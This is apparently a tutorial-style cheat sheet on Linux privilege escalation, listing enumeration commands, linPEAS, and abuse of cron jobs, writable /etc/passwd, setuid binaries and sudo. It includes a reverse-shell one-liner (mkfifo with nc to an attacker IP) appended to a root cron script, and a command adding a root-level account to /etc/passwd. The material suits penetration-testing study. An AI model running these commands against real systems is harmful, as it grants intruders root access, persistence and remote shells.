Introduction
What is Privilege Escalation?
A privilege escalation is a cyberattack designed to gain unauthorized privileged access into a system. This not only make us able to access all resources on the system, but also closely related to lateral movement. We can dump other user’s credential which saved in this system, so that we can use these credential to try to access other devices on the same intranet. Here I will show you same method to make a privilege escalation on the Linux Operating System.
Manual Enumeration (Information Gathering)
id
hostname
env
: check environment variablecat .bashrc
: check initialization scripthistory
: check previously executed commandscat /etc/passwd
: show all users informationuname -a
: check system version and find if this version has kernel vulnerabilitiescat /etc/issue
: check system versioncat /etc/os-release
: check system versionps aux
: list all processfind / -writable -type d 2>/dev/null
: find the folders that you are able to modifyfind / -perm -u=s -type f 2>/dev/null
: find the executable file with setuid flagfind / -name *backup* -type f 2>/dev/null
ls -lah /etc/cron*
: traverse scheduled tasksss -anp
: display active network connections and listening portslsmod
: enumerate the loaded kernel modules
Automated Enumeration (Information Gathering)
- linPEAS
- unix-privesc-check [standard | detailed]
Abusing Cron Jobs
Check cron job:
grep "CRON" /var/log/syslog
Find the job which will run with the root permission
Check if this job’s file is writable
Write payload to this file and wait:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [local ip] [port] >/tmp/f" >> [target job file].sh
Abusing Password Authentication
Check passwd & shadow file permission, check if passwd file is writable or shadow file is readable
Linux password hash algorithm: sha-256, we can use openssl to generate it
Generate password hash command:
openssl passwd [passsword]
If passwd file is writable, we can use
echo "root2:[password hash]:0:0:root:/root:/bin/bash" >> /etc/passwd
to overwrite the credential of root
Abusing setuid Binaries and Capabilities
Find program which has setuid permission:
/usr/sbin/getcap -r / 2>/dev/null
Go to GTFOBins to find exploit. This website provides an organized list of UNIX binaries and how can they be misused to elevate our privileges
Abusing Sudo
Run
sudo -l
to check our permissionGo to GTFOBins to find exploit
By the way
Privilege escalation is very flexible, and the methods I introduced are only the most common ones. In a real case, you need to do the information gathering carefully, and try to exploit human behaviors, design flaws or oversights in operating systems or web applications. I recommend carefully checking the output information of linpeas, which often contains vulnerabilities that you can use to escalate privileges.